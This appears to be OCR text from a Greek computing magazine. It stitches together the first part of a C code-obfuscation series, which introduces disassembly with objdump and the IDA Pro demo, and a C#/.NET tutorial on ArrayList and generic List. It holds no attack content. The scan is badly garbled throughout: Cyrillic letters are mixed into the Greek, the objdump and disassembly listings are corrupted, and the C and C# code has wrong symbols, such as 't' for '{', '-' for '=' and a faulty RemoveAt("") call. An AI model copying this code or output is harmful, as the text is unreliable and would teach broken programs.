To disassembly, για να επιστρέψουµε στο θέµα µας, αποτελεί την αντίστροφη διαδι- 
κασία. Μη νομίζετε όμως ότι ξεκινάει από την τελική µορφή ενός εκτελέσιµου και 
καταφέρνει va µας δώσει τον πηγαίο κώδικα. Κάτι τέτοιο εἶναι απλά αδύνατο! Με 
TO disassembly, όπως μαρτυρά και то буора тпс διαδικασίας, παίρνουμε τον κώδικα 
του εκάστοτε εκτελέσιµου σε μορφή Assembly (Assembly code). Αυτό είναι εφικτό 
γιατί σε κάθε εντολή Assembly αντιστοιχεί ένας συγκεκριμένος συνδυασμός bytes, 
που ονομάζεται opcode. Επομένως, γιατη μετατροπή ενός εκτελέσιµου αρχείου σε 
κώδικα Assembly απαιτείται µια αντικατάσταση. Τα πράγματα όµως δεν εἶναι τόσο 
απλά όσο ακούγονται. Μέσα σε κάθε εκτελέσιμο, βλέπετε, υπάρχουν αρκετά трӯра- 
τα (sections) που δεν περιλαμβάνουν όλα κώδικα. 


Πα να δείτε πόσα διαφορετικά τμήματα περιλαμβάνει éva εκτελέσιμο, ανοίξτε τον 
αγαπημένο σας text editor και πληκτρολογήστε το παρακάτω προγραμματάκι: 
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#include <stdio.h> 

int main() 

t 
printf("Hello, World!in"); 
return 0; 


} 


Αποθηκεύστε το ως "hello.c', ανοίξτε ένα τερματικό (αν δεν δουλεύατε ήδη στη 
γραμμή εντολών) και μεταβείτε στον κατάλογο όπου αποθηκεύσατε rov κώδικα. Па 
τη μετατροπή σε εκτελέσιμο δώστε TO ακόλουθο: 


$ gcc -m32 hello.c -o hello 


H παράμετρος -m32 εξασφαλίζει ότι το τελικό εκτελέσιμο θα εἶναι τύπου elf-32bit 
και η χρήση της είναι αναγκαία για την εργασία µας, καθώς τα περισσότερα σηµε- 
рма συστήµατα είναι 64ртита. H μεταγλώττιση θα ολοκληρωθεί γρήγορα και θα 
προκύψει το τελικό εκτελέσιμο µε το όνομα "hello". Па va τσεκάρετε τη φύση TOU 
αρχείου χωρίς να εμφανιστεί ένα κατεβατό άσχετων πληροφοριών, µπορείτε va 
χρησιμοποιήσετε το εργαλείο file: 


$ file hello 


Στο μήνυμα που θα εμφανιστεί θα δείτε va γίνεται λόγος για éva εκτελέσιμο τύπου 
ΕΙ 32-bit, ευθύς εξαρχής. Πα να δείτε ra sections που απαρτίζουν το εκτελέσιμο 
αρχείο, µπορείτε να χρησιμοποιήσετε το εργαλείο objdump: 


$ objdump -h hello 


Όπως θα διαπιστώσετε, αυτό το μικροσκοπικό και απλούστατο πρόγραµµα περι- 
λαμβάνει 26 sections! Το objdump εμφανίζει διάφορες πληροφορίες για κάθε "πε- 
рох", όπως την έκταση (size), τη διεύθυνση της εικονικής μνήμης στην οποία θα 
βρεθεί ката την εκτέλεση του προγράµµατος (ММА από ro Virtual Memory Address) 
κ.λπ. Σημειώστε ότι ο κώδικας βρίσκεται συνήθως στο section µε ro буора "text". 


Πριν προχωρήσουμε, πρέπει να αναφέρουμε ότι υπάρχουν δύο διαφορετικά συντα- 
ктіка γιατη γλώσσα Assembly. Το ένα προέρχεται апо την εταιρία AT&T кох To άλλο 
апо την Intel. Θα λέγαμε ότι ra δύο συντακτικά εἶναι ισοδύναμα, καθώς δεν παρου- 
σιάζουν πλεονεκτήματα ñ μειονεκτήματα σε σχέση µε rnv απόδοση του κώδικα. Αν 
ωστόσο κάποιος προγραμματιστής εἶναι εξοικειωμένος µε το ένα µόνο συντακτικό, 
τότε αν απὀ τη διαδικασία του disassembly πάρει κώδικα του άλλου συντακτικού 
ενδέχεται να δυσκολευτεί λίγο περισσότερο. Ας µην κολλάμε σε λεπτομέρειες 
όμως. Πρέπει να δούµε επιτέλους πώς ακριβώς επιτυγχάνεται το disassembly. 
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Code obfuscation στη γλὠσσα C [μέρος 1] 


magédebian:-$ objdump -h hello 


hello: file format elf32-i386 

Sections: 

Idx Name Size VMA LMA File off Algn 
0 .interp 00000013 08048134 08048134 00000134 2**0 


CONTENTS, ALLOC, LOAD, READONLY, DATA 

1 .note.ABI-tag 00000020 08048148 08048148 00000148 2**2 
CONTENTS, ALLOC, LOAD, READONLY, DATA 

2 .note.gnu.build-id 00000024 08048168 08048168 00000168 2**2 
CONTENTS, ALLOC, LOAD, READONLY, DATA 


3 .hash 00000028 0804818с 0804818с 0000018с 2**2 
CONTENTS, ALLOC, LOAD, READONLY, DATA 

4 .gnu.hash 00000020 08048104 08048104 000001b4 25:2 
CONTENTS, ALLOC, LOAD, READONLY, DATA 

5 .dynsym 00000050 080481d4 08048104 00000104 2**2 
CONTENTS, ALLOC, LOAD, READONLY, DATA 

6 .dynstr 0000004a 08048224 08048224 00000224 2**0 


CONTENTS, ALLOC, LOAD, READONLY, DATA 

7 .gnu.version 0000000а 0804826е 0804826е 0000026ε 2**1 
CONTENTS, ALLOC, LOAD, READONLY, DATA 

8 .gnu.version г 00000020 08048278 08048278 00000278 2**2 
CONTENTS, ALLOC, LOAD, READONLY, DATA 


9 .rel.dyn 00000008 08048298 08048298 00000298 2**2 
CONTENTS, ALLOC, LOAD, READONLY, DATA 

10 .rel.plt 00000018 080482а0 080482а0 000002а0 2**2 
CONTENTS, ALLOC, LOAD, READONLY, DATA 

11 .init 00000026 080482b8 080482b8 000002b8 2**2 
CONTENTS, ALLOC, LOAD, READONLY, CODE 

12 .plt 00000040 080482е0 080482е0 000002е0 2**4 
CONTENTS, ALLOC, LOAD, READONLY, CODE 

13 .text 00000180 08048320 08048320 00000320 2**4 
CONTENTS, ALLOC, LOAD, READONLY, CODE 

14 .fini 00000017 080484a0 080484a0 000004а0 2**2 
CONTENTS, ALLOC, LOAD, READONLY, CODE 

15 .rodata 00000016 080484b8 080484b8 000004b8 2**2 


CONTENTS, ALLOC, LOAD, READONLY, DATA 

16 .eh frame hdr 0000001с 08048440 080484d0 000004d0 2**2 
CONTENTS, ALLOC, LOAD, READONLY, DATA 

17 .eh frame 00000060 080484ес 080484ес 000004ес 2**2 
CONTENTS, ALLOC, LOAD, READONLY, DATA 

18 .init array 00000004 0804954с 0804954с 0000054с 2**2 
CONTENTS, ALLOC, LOAD, DATA 

19 .fini array 00000004 08049550 08049550 00000550 2**2 
CONTENTS, ALLOC, LOAD, DATA 


20 .jcr 00000004 08049554 08049554 00000554 2**2 
CONTENTS, ALLOC, LOAD, DATA 

21 .dynamic 000000f0 08049558 08049558 00000558 2**2 
CONTENTS, ALLOC, LOAD, DATA 

22 .got 00000004 08049648 08049648 00000648 2**2 
CONTENTS, ALLOC, LOAD, DATA 

23 .got.plt 00000018 0804964с 0804964с 0000064с 2**2 
CONTENTS, ALLOC, LOAD, DATA 

24 .data 00000008 08049664 08049664 00000664 2**2 
CONTENTS, ALLOC, LOAD, DATA 

25 .bss 00000004 0804966с 0804966с 0000066с 2**2 
ALLOC 

26 .comment 00000038 00000000 00000000 0000066с 2**0 


CONTENTS, READONLY 
magédebian:-$ 


To µικρό και απλούστατο προγραμματάκι µας 
μεταγλωττίστηκε σε ένα εκτελέσιμο αρχείο που 
περιλαμβάνει 26 sections! 
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Μέθοδοι μετατροπής 


Па тп μετατροπή ενός εκτελέσιµου αρχείου σε κώδικα Assembly υπάρχουν δύο aà- 
γόριθµοι: o linear sweep και ο recursive traversal. O πρώτος αλγόριθμος (linear sweep) 
ξεκινά апо την αρχή κάθε section kat αποκωδικοποιεί” ra bytes που συναντά γραμµι- 
κά, θεωρώντας ότι πρόκειται για opcodes. Με τον оро γραμμικά εννοούμε ότι όταν 
εντοπιστεί µια εντολή κλήσης συναρτήσεων (call), μετάβασης (jmp) ñ διακλάδωσης 
(jz, je, jnc, jpo κ.ά.) ο αλγόριθμος συνεχίζει τη δουλειά του µε την αµέσως επόμενη 
εντολή και αδιαφορεί πλήρως για την όποια µεταβολή επιχειρήθηκε στη ροή του 
προγράµµατος. Με άλλα λόγια, то section σαρώνεται byte προς byte και κάθε opcode 
μεταφράζεται στην αντίστοιχη εντολή Assembly. Ot πιθανές διακλαδώσεις αγνοού- 
νται. To πλεονέκτημα αυτής της προσέγγισης εἶναι ότι αποκωδικοποιούνται холах 
τα bytes του εκάστοτε section, ενώ TO μειονέκτημα είναι ότι αποκωδικοποιούνται 
ακόμα και bytes που αποτελούν δεδοµένα (data) κι ὀχι εντολές. Μερικά προγράµµα- 
τα που χρησιμοποιούν αυτόν τον αλγόριθμο είναι τα даб, WinDbg και objdump. 


О δεύτερος αλγόριθμος (recursive traversal) ομοιάζει µε τον πρώτο, µε την έννοια 
ότι μεταφράζει ra opcodes που συναντά διαδοχικά. Ωστόσο, όταν εντοπίζει εντολές 
που επηρεάζουν τη ροή εκτέλεσης του προγράμματος, συμπεριφέρεται λίγοπιο TO- 
νηρά. Πριν προχωρήσει στο αμέσως επόμενο opcode, αποθηκεύει τη διεύθυνση της 
διακλάδωσης σε μιαλίστα. Αργότερα, όταν φτάσει στο τέλος του κώδικατου τρέχο- 
ντος section, επαναλαμβάνει την ίδια διαδικασία σε καθεμία από тїс θέσεις που TE- 
ριλαμβάνει η λίστα. Ένα πλεονέκτημα αυτού του αλγόριθμου αποτελεί το γεγονός 
ότι αποκωδικοποιεί µόνο ra bytes που θα εκτελούσε το σύστημα κι όχι όλα ανεξαι- 
ρέτως, όπως o linear Sweep. AUTÓG O aAyópt8uoc, όμως, ενδέχεται να προσπεράσει 
κάποια τμήματα TOU προγράμματος χωρίς va rd μεταφράσει. Αυτό συμβαίνει ότανη 
διεύθυνση των συγκεκριμένων τμημάτων δεν αναφέρεται ρητά µέσα στον кшбіка. 
Όπως θα δούµε αργότερα, υπάρχουν διάφοροι τρόποι үа va εκτελέσουµμε TOV κώδι- 
κα µιας περιοχής, χωρίς να εμφανίζεται η σχετική διεύθυνση µέσα στο πρόγραμμα. 
Ουσιαστικά, πρόκειται για µία τεχνική συσκότισης και, όπως αντιλαμβάνεστε, στην 
περίπτωση rou recursive traversal λειτουργεί µε επιτυχία. Ένα σχετικά γνωστό TÓ- 
γραμμα που χρησιμοποιεί τον εν λόγω αλγόριθµο είναι ro IDA Pro. 


Οι αλγόριθµοι σε δράση 
Εφόσον βρισκόσαστε σε κάποιο σύστημα Unix, το μόνο πρόγραμμα που πρέπει να 
εγκαταστήσετε είναι ro IDA Pro Demo. H πιο πρόσφατη έκδοση διατίθεται απὀ τη 


διεύθυνση www.hex-rays.com/products/ida/support/download. demo.shtml. Εμείς 
κατεβάσαμε το σχετικό πακέτο πληκτρολογώντας: 


$ wget https://out7.hex-rays.com/files/idademo68 linux.tgz 
Κατόπιν, χρησιμοποιήσαμε ro tar yla vq αποσυμπιέσουμε: 


$ tar -xzf idademo68 linux.tgz 
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Code obfuscation στη γλὠσσα C [μέρος 1] 


804964e: 04 08 add 50χ8, 841 
8049658: f6 82 04 08 06 83 04 testb $0x4,-0x7cf9f7fc($*edx) 
804965f: 08 16 or $dl,($esi) 
8049661: 83 .-byte 0x83 
8049662: 04 08 add $0х8,%а1 
Disassembly of section .data: 
08049664 « data start»: 
8049664: 00 00 add $al,($eax) 
08049668 < азо handle»: 
8049668: 00 00 add $al,($eax) 
Disassembly of section .bss: 
0804966c «completed.5730»: 
804966c: 00 00 add $al,($eax) 
Disassembly of section .comment: 
00000000 «.comment»: 
0: 47 inc Sedi 
1s 43 inc %ерх 
2: 43 іпс %ерх 
3: За 20 стр (%еах), %аһ 
5: 28 44 65 62 sub $al,0x62($ebp,$eiz,2) 
9: 69 61 6e 20 34 2e 37 imul $0х372е3420,0хбе(%есх),%езр 
10: 2е 32 2а 35 29 20 34 xor %сз:0х34202935,%сһ 
17: 2е сз 
18: 37 ааа 
19: 2е 32 00 хог $cs:($eax),$al 
1с: 47 іпс Sedi 
1а: 43 inc %ebx 
le: 43 inc %ebx 
1f: 3a 20 cmp ($eax),$*ah 
21: 28 44 65 62 sub $al,0x62($ebp,$eiz,2) 
25: 69 61 6e 20 34 2e 34 imul $50х342е3420,0хбе(%есх),%езр 
2с: 2е сз 
2а: 37 ааа 
2е: 2а 32 29 20 34 зор $0x34202932,$eax 
33: 2e cs 
34: 34 2e xor $0x2e,$al 
36: 37 aaa 


magédebian:-$ 


To αποτέλεσµα rou disassembly µε τον objdump μοιάζει µε 
µια ατελείωτη λίστα. Το πρόγραμμα μετέτρεψε σε Assembly 
ακόµα και κάποια sections που περιλαμβάνουν δεδομένα. 
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Με την αποσυµπίεση προέκυψε ένας κατάλογος που περιλαμβάνει το πρόγραµµα, 
έτοιμο προς εκτέλεση. 


Ας δούμε τώρα πώς "μεταφράζουν" οι αλγόριθμοι linear sweep και recursive traversal 
το προγραμματάκι hello. Προκειμένου va κατανοήσετε τη φιλοσοφία rou linear 
sweep, μεταβείτε στον κατάλογο που περιλαμβάνει ro hello κι εκτελέστε το ακό- 
λουθο: 


$ objdump -D hello 


Όπως θα διαπιστώσετε, το objdump αποκωδικοποιεἰ σχεδόν όλα τα sections του 
εκτελέσιµου αρχείου, ανεξάρτητα από το αν περιέχουν κώδικα ἡ δεδοµένα. Στα 
sections που περιλαμβάνουν δεδοµένα 8a παρατηρήσετε ότι τόσο οι εντολές, όσο 
και ot παράμετροί τους, παρουσιάζουν µια ύποπτη ομοιομορφία. Па παράδειγµα, 
μπορείτε να αντιπαραθέσετε τα αποτελέσµατα του disassembly από τα sections 
"text" και ".gnu.version'". 


Πα va δείτε τη διαφορά μεταξύ των δύο αλγορίθμων, µεταβείτε στον κατάλογο µε 
το IDA Pro demo και ξεκινήστε το πρόγραμμα: 


$ ./idaq 


Έχετε υπόψη ότι την πρώτη фора που θα ro τρέξετε κι αµέσως µετά την οθόνη ka- 
λωσορίσµατος, θα εμφανιστεί η άδεια χρήσης του προγράµµατος. Αφού απαντήσετε 
θετικά στο αν την αποδέχεστε, εμφανίζεται éva νέο παράθυρο µε δύο βασικές επιλο- 
γές. Επειδή η εκμάθηση rou IDA Pro ξεφεύγει από το σκοπό του παρόντος, ακολουθή- 
στε την εύκολη οδό και πατήστε στο κουμπί "New". Έτσι, θα εμφανιστεί ένα παράθυρο 
για την επιλογή του προγράµµατος που θέλετε va αναλύσετε. Αν για κάποιο λόγο δεν 
εμφανίζεται ro hello, µπορείτε να δώσετε τη θέση και το όνοµα χειροκίνητα. Εμείς, 
για παράδειγµα, δώσαμε /home/mag/hello", καθώς είχαμε γράψει και μεταγλωττίσει 
το hello.c µέσα oro home directory. Όταν ανοίξετε το hello το IDA θα εμφανίσει éva εἰ- 
δος γραφήματος που μοιάζει µε δέντρο, σε κάθε κόμβο του οποίου υπάρχει o κώδικας 
κάποιας υπορουτίνας. Κάνοντας δεξί κλικ σε κάποιο κόμβο κι επιλέγοντας ro "Text 
view", το πρόγραµµα εμφανίζει ολόκληρο τον κὠδικατης σχετικής υπορουτίνας. 


Όπως είδατε, οι δύο προσεγγίσεις ото disassembly οδηγούν σε εντελώς διαφορετικά 
αποτελέσµατα. Μη βιαστείτε va επιλέξετε, όµως, ούτε va αποφανθείτε үа то ποιος 
αλγόριθμος είναι καλύτερος. Βρισκόμαστε ακόµα στην αρχή Kat yta TNV wpa δεν £xou- 
με δει ούτε μία μέθοδο συσκότισης του κώδικα. Όταν προχωρήσουμε στη µελέτη 
αυτών των τεχνικών, θα μπορείτε va εκτιμήσετε πιο ολοκληρωμένατα προτερήματα 
καιτις αδυναμίες κάθε προσέγγισης στο disassembly. Μέχρι τότε, Ва σας προτείναµε 
ναπαίξετε ue ro IDA Pro demo και va εξοικειωθείτε µε το περιβάλλον του. Πρόκειται 
για ένα εργαλείο που χρησιµοποιείται από όλους όσοι ασχολούνται µε ro malware 
analysis και ο χρόνος που θα επενδύσετε αξίζει µε το παραπάνω. 
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Code obfuscation στη γλὠσσα C [μέρος 1] 


uc IDA. -ox 
ъа 5 + s DO йшй} # o uh X » D D Localtnuaebuger v) 4 [8] m g* 1 

ШЕШ ΤΣΗ ШШЩЕ 11 1 E: E 
Data ДЙ Regular function [I Unexplored instruction External symbol 

oleje] [E] IDAView-A ж [ΠῚ IDAView-B ж [I] IDAView-C ж [5] Hex View-1 ж [A] Structures ж С] Enums X 2) ітропѕ X (25) Exports κ 


deregister tm clones 
register tm clones 

. do global dtors aux 

frame dummy 

main 

libc csu fini 

ibc csu init 

86 get pc thunk bx 

term proc 
putsG'GGLIBC 2 0 

— libc start main GGLIBC 2 | 


. 
Line 5of 19 100.00* 


AU: idle Down Disk: 3GB 


To IDA Pro έχει πολλές και ενδιαφέρουσες δυνατότητες. To πλαίσιο στα αριστερά περιλαμβάνει όλες τις 
συναρτήσεις που εντοπίστηκαν κατά τη διαδικασία του disassembly. Στην κεντρική περιοχή βλέπουμε ένα 
διάγραμμα του κώδικα που θυμίζει δέντρο. Από αυτό το διάγραμμα μπορούμε να πάρουμε µια πρώτη ιδέα για 
τη διάρθρωση και τη γενική λειτουργία του κώδικα. 


ΓΝ IDA -0x 
Fie Edit Jump Search View Debugger Options Windows Help 


Library function Data B Regular function M Unexplored |l instruction External symbol NEC 


[CA Functions window |8) 5 69 | Т iDAViewA κ 


deregister tm clones 
'egister tm clones 
do global dtors aux 
rame dummy 
main 

. libc csu fini 
. libc csu init 


0804840C 
0804840C 


puts@@GLIBC_2_0 
libc start main@@GLIBC_2_ 


— libc start main 
..gmon statt — 

wa . 0000040C 08048405: main (Synchronized with Hex View-1) . 

пе 5 of 19 | . 

[E] Output window. & 

[те 7HOmE7DVST7nEIIO паз Deen SUCCeSSTUIIY 10aded Into спе database. Г] 


'ar/idademo68/idc/ida.1 


lademo68/1dc/onload.idc'... 


Down Disk: 3GB 


Επιλέγοντας ro "text view" για κάποιον από τους κόμβους, ro IDA Pro εμφανίζει τον Κώδικα της αντίστοιχης 
υπορουτίνας. Παρατηρήστε ότι στο πάνω µέρος του παραθύρου εμφανίζεται µια μπάρα που αναπαριστά τη 
γενική διάρθρωση του εκτελέσιµου αρχείου. Σε αυτή τη μπάρα χρησιμοποιούνται διαφορετικά χρώματα για 
τον Κώδικα, για ra δεδοµένα και για τις περιοχές που δεν έχουν μεταφραστεί καθόλου. 
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Skill: Intermediate 
Tags: .NET, C-sharp, list, stack, queue, dictionary 


Ανάπτυξη εφαρμογών 
σε C# yuq To .NET 


[μέρος 6ο] 


Σε αυτό το µέρος της σειράς µας κατακτάµε τις απαραίτητες γνώσεις WOTE та 
προγράμματά µας va χειρίζονται τα διάφορα δεδοµένα µε τον πιο αποδοτικό 
τρόπο. Σε αυτή την υπόθεση εξυπηρετούν οι δοµές δεδοµένων, οι οποίες δεν 

οργανώνουν µόνο δεδοµένα, αλλά και την ἴδια τη σκέψη ενός προγραμματιστή. 


του Πέτρου Κυλαδίτη 


H αλληλεπίδραση µε το σύστηµα αρχείων, µε την οποία εξοικειωθήκαµε oro προη- 
γούμενο τεύχος, αποτελεί µια κρίσιμη πτυχή rou προγραμματισμού σε οποιαδήποτε 
γλὠσσα. Ωστόσο, πριν φτάσουμε να αποθηκεύσουµε οτιδήποτε σε κάποιο αρχείο, 
όπως και πριν ανοίξουμε κάποιο για ανάγνωση, πρέπει να έχουµε στήσει έναν µηχα- 
γισμό που θα επεξεργάζεται τα δεδομένα µας. O πιο πολύτιμος σύμμαχος σε αυτή 
την εργασία εἰναι οι δοµές δεδοµένων, που επιτρέπουν στον προγραμματιστή να 
οργανώνει και να διαχειρίζεται τα διάφορα δεδοµένα µε ευκολία. Στο παρόν τεύχος 
ασχολούμαστε µε τις δοµές δεδοµένων που προσφέρει то .NET framework. 


Συλλογές 


Μια δοµή δεδοµένων που έχουµε ήδη χρησιμοποιήσει εἶναι οι πίνακες. Οι πίνακες 
(arrays) στη C£, όπως και σε αρκετές ακόµα γλώσσες, αποτελούν µια στατική δομή 
δεδομένων. (Αυτό ισχύει στις λεγόμενες στατικές γλώσσες. Παρεμπιπτόντως, η 
04 δεν είναι αμιγώς στατική, αφού παρέχει και αρκετούς δυναμικούς τύπους ÕS- 
δομένων) Anag και δημιουργηθεί ένας πίνακας, δεν µπορεί να αλλάξει το µἐγεθός 
TOU. Па va προσθέσουμε στοιχεία, το µόνο που μπορούμε να κάνουμε είναι να δηµι- 
ουργήσουµε éva µεγαλύτερο πίνακα, να αντιγράψουµε σ αυτόν τα περιεχόμενα TOU 
παλιού και να προσθέσουμε τα νέα δεδομένα. Ίσως αυτό να ακούγεται αρκετά TLE- 
ριοριστικό και σχεδόν δυσάρεστο, αλλά δεν είναι. Αφενός, τις περισσότερες φορές 
γνωρίζουμε εξ αρχής πόσα στοιχεία θα φιλοξενεί ο εκάστοτε πίνακας κι αφετέρου, 
στην περίπτωση που χρειαζόμαστε έναν πιο ελαστικό αποθηκευτικό χώρο, μπορού- 
μενα στραφούμε σε κάποια апо тїс δυναμικές δομές δεδομένων που ενσωματώνει 
TO .NET framework. Μια τέτοια δομή είναι η ArrayList. Ουσιαστικά πρόκειται για miva- 
κες, το μήκος των οποίων μπορεί να μεταβάλλεται δυναμικά. Οι πίνακες αυτού του 
είδους αποθηκεύουν τα δεδοµένα ως αντικείμενα µιας προκαθορισµένης κλάσης 
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Ανάπτυξη εφαρμογών σε C£ yia ro .NET [μέρος бо] 


a dh044 - ArrayListExample - Καλοκαιρινές διακοπές 


Εισάγετε τα ovópaca των προορισμών σας. 

Δώστε κενή συμβολοσειρά για τερματισμό της εισαγωγής. 
Προορισμός 1 : Φολέγανδρος 

Προορισμός 2 : Ανάφη 

Προορισμός 3 : Φούρνοι 


- Φολέγανδρος 
- Ανάφη 
- Φούρνοι 


Ιδού ro "island hopping" που θέλαμε να κάνουμε φέτος! 
Εσείς που θα θέλατε να πάτε; (Σ.Τ.Ε. Σβάλμπαρντ) 


και η σχετική μετατροπή πραγματοποιείται αυτόματα. Όταν θέλουμε να διαβάσου- 
µε δεδοµένα που ἔχουν αποθηκευτεί στον πίνακα, πρέπει να γνωρίζουμε τον τύπο 
τους και να πραγματοποιούμε τις αντίστροφες μετατροπές χειροκίνητα. Av αυτή η 
περιγραφή σας µπέρδεψε, μελετήστε το ακόλουθο παράδειγµα. Πρόκειται για ένα 
πρόγραµµα που ζητά από το χρήστη να πληκτρολογήσει τους επιθυμητούς προορι- 
σμούς үа тіс καλοκαιρινές διακοπές, µετά τους αποθηκεύει σε ένα ArrayList και στη 
συνέχεια τους ανακαλεί για να τους τυπώσει στην κονσόλα 


01 using System; 

02 using System.Collections; 
03 

04 namespace ArrayListExample( 
05 class Programi 


06 public static void Main(string[] args)t 
07 ArrayList dest al - new ArrayList(); 
08 string destination; 
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09 int 1 = 0; 

10 

11 Console.Title = "dh044 - C# Μέρος бо - Парабегуна ArrayList"; 

12 Console.WriteLine("ELoáyete τα ovópata των προορισμών σας. ληλώστε 
κενή συμβολοσειρά για τερματισμό. "); 

13 do í 

14 Console.Write("Ipooptouóc " + (**i).ToString() +": "); 

15 destination - Console.ReadLine(); 

16 dest al.Add(destination); 

17 ) while (destination !- ""); 

18 

19 dest al.RemoveAt(dest al.Count - 1); 

20 

2 Console.WriteLine("NnWnóétog θα πάτε: "); 

22 foreach(object element in dest а1){ 

23 Console.Writeline(" - " + (string)element); 

24 } 

25 Console.ReadKey(true); 

26 } 

Z2y η 

28 } 


Το πρώτο πράγµα που πρέπει να κάνουμε για να εργαστούμε µε µια δομή ArrayList, 
είναι να δηλώσουμε τη χρήση του namespace '"System.Collections". Στη συνέχεια, για 
τη δηµιουργία ενός αντικειμένου ArrayList αρκεί να χρησιμοποιήσουμε τη σχετική 
συνάρτηση (μέθοδο) δημιουργίας. Όπως βλέπετε στη γραμμή 07, εμείς καλούμε την 
εν λόγω συνάρτηση χωρίς παραμέτρους. Έτσι, καταφέρνουµε va δημιουργήσου- 
µε éva νέο αντικείµενο ArrayList, ue την προεπιλεγµένη αρχική χωρητικότητα. Θα 
μπορούσαμε να καθορίσουμε το αρχικό μέγεθος, δίνοντάς το ως παράμετρο στη OU- 
νάρτηση κατασκευής. Εναλλακτικά, θα μπορούσαμε να φτιάξουμε ένα ArrayList µε 
αρχικό μέγεθος "και περιεχόμενα, που θα προέρχονταν από έναν ήδη υπάρχοντα 
πίνακα. Σ’ αυτή την περίπτωση θα δίναμε ως παράμετρο στη συνάρτηση κατασκευ- 
ής τον πίνακα µε τα δεδοµένα. Στο βρόχοπου ακολουθεί (γραμμές 13 ёшс 17) συλλέ- 
γουµε τους προορισμούς διακοπών που δηλώνει ο χρήστης και τους προσθέτουμε 
στο ArrayList, χρησιμοποιώντας τη μέθοδο Add(object). H συλλογή των προορισμών 
σταματάει όταν ο χρήστης εισάγει µια κενή συμβολοσειρά. Επειδή όµως ο έλεγχος 
τερματισμού βρίσκεται στο τέλος του βρόχου, το ArrayList θα περιλαμβάνει πάντα 
ως τελευταίο στοιχείο µια κενή συμβολοσειρά. Αυτό δεν εἶναι επιθυμητό, οπότε 
χρησιμοποιούμε τη μέθοδο RemoveAt(position) για να αφαιρέσουμε το συγκεκριµέ- 
νο στοιχείο (γραμμή 19). Па να βρούμε ποια εἶναι η θέση αυτού του πεδίου --δηλα- 
δή το τελευταίο στοιχείο--, αξιοποιούµε την ιδιότητα Count (επιστρέφει το πλήθος 
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Στο πλοίο μπήκαν 4 οχήματα 

Το όχημα που μπήκε τελευταίο είναι το MYB-992 
Τα οχήματα θα πρέπει να εξέλθουν µε την εξής 
1 - MYB-9921 [κι απομένουν ακόμα 3 οχήματα εν 


2 - KNM-5674 [κι απομένουν ακόµα 2 οχήματα εν 
3 - XIE-1212 [κι απομένουν ακόµα 1 οχήματα εν 
4 - XIA-2478 [κι απομένουν ακόμα © οχήματα εν 


L 

σειρά: 

τός του πλοίου] 
τός του πλοίου] 
τός του πλοίου] 
τός του πλοίου] 


> 


Аха! Εδώ έχουµε να κάνουμε είτε µε ένα πολύ pikpó ferry boat είτε µε κάποιον προορισμό στην άγονη 
γραμμή. Όπως και να χει, ra αυτοκίνητα πρέπει να αποβιβαστούν µε τη συγκεκριμένη σειρά. 


των στοιχείων). Από αυτό το μέγεθος αφαιρούμε µια µονάδα, καθώς η αρίθµηση 
των στοιχείων ενός ArrayList ξεκινά από το μηδέν. Εναλλακτικά, για τη διαγραφή θα 
μπορούσαμε να είχαμε χρησιμοποιήσει τη μέθοδο Remove(object). Αυτή η μέθοδος 


διαγράφει το αντικείµενο που της δίνουμε σαν παρ 
μορφή για τη γραμμή 19 εἰναι η ακόλουθη: 


al.RemoveAt(""); 


άμετρο. Έτσι, µια εναλλακτική 


Τα στοιχεία ενός ArrayList μπορούν va προσπελαστούν σειραϊκά, µε τη χρήση της 


δομής επανάληψης foreach. Ακριβώς αυτήν χρησιμοι 


ποιούμε στο παράδειγµα, yta va 


διαβάσουμε και va εμφανίσουμε τους προορισμούς! 


που έδωσε ο χρήστης. Παρατη- 


ρείστε ro type casting που πραγματοποιούµε πριν апо την εμφάνιση κάθε στοιχείου 
στην κονσόλα. Αυτή η μετατροπή θα μπορούσε va αυτοματοποιηθεί, ορίζοντας rov 
τύπο string εντός της δομής foreach. Σε κάθε περίπτωση, κάθε φορά που αντλούμε 
δεδομένα από ένα ArrayList πρέπει να γνωρίζουμε τον τύπο τους. 


Άλλες χρήσιμες μέθοδοι της κλάσης ArrayList εἶναι 


οι ακόλουθες: 


* AddRange(array): εισάγει τα στοιχεία ενός ολόκληρου πίνακα 


* Clear(): διαγράφει όλα τα στοιχεία της λίστας 


* Contains(object): ελέγχει av υπάρχει το συγκεκριµένο στοιχείο στη λίστα 
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* Βενειςε()αντιστρέφειτη σειρά των στοιχείων της λίστας 
* Sort(): πραγματοποιεί ταξινόμηση των στοιχείων 
* ToArray(): επιστρέφει έναν πίνακα µε τα στοιχεία της λίστας 


H κλάση ArrayList αποτελεί éva πολύ ισχυρό εργαλείο. Ωστόσο, το γεγονός ότι πρέ- 
πει ναγνωρίζουμε τον τύπο των αποθηκευμένων δεδοµένων συνιστά μεγάλο HTE- 
Aá. Από πολύ νωρίς, n Οὐ άρχισε va υποστηρίζει éva νέο είδος κλάσεων, που έχει TO 
όνομα generics. Σε αυτό το είδος συγκαταλέγεται και η κλάση List, που καθιστά την 
ArrayList ξεπερασμένη. Па va καταλάβετε που κολλάει το "generics", σκεφτείτε ότι 
οι κλάσεις αυτού του είδους δεν χειρίζονται συγκεκριμένους τύπους δεδοµένων. 
Φυσικά, κάθε κλάση έχει το δικό της τρόπο λειτουργίας, που εκδηλώνεται µέσα από 
τις αντίστοιχες μεθόδους. Ωστόσο, η φύση των δεδοµένων που θα φιλοξενεί καθο- 
ρίζεται апо το χρήστη. Πα παράδειγµα, δείτε τη δηµιουργία ενός αντικειμένου List, 
που προορίζεται για το χειρισμό συμβολοσειρών: 


List«string» myList = new List«string^(); 


Οι μέθοδοι και οι ιδιότητες που συναντήσαμε στην κλάση ArrayList απαντώνται και 
στην κλάση List, ενώ υπάρχουν και αρκετές πρόσθετες. Δείτε тоос θα μπορούσε να 
γραφεί το πρόγραμμα που εξετάσαµε νωρίτερα, µε τη χρήση της κλάσης List: 


01 using System; 

02 using System.Collections.Generic; 
03 

04 namespace ArrayListExample( 

05 class Program( 


06 public static void Main(string[] args)í 

07 List«string» dest lst = new List«string*(); 

08 string destination; 

09 ime al — (115 

10 

11 Console.Title = "dh044 - С# Μέρος бо - Παράδειγμα Generics List"; 

12 Console.WriteLine("ELoáyete τα ονόματα των προορισμών σας. ληλώστε 
κενή συμβολοσειρά για τερματισμό. "); 

13 dot 

14 Console.Write("Ipooptouóc " + (**i).ToString() 1": "); 

15 destination - Console.ReadLine(); 

16 dest lst.Add(destination); 

17 while (destination != ""); 

18 
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19 dest lst.RemoveAt(dest lst.Count - 1); 
20 

2 Console.WriteLine("NnWnóétog θα πάτε: "); 
22 foreach(string element in dest lst)[ 

23 Console.Writeline(" - " + element); 
24 } 

25 Console.ReadKey(true); 

26 } 

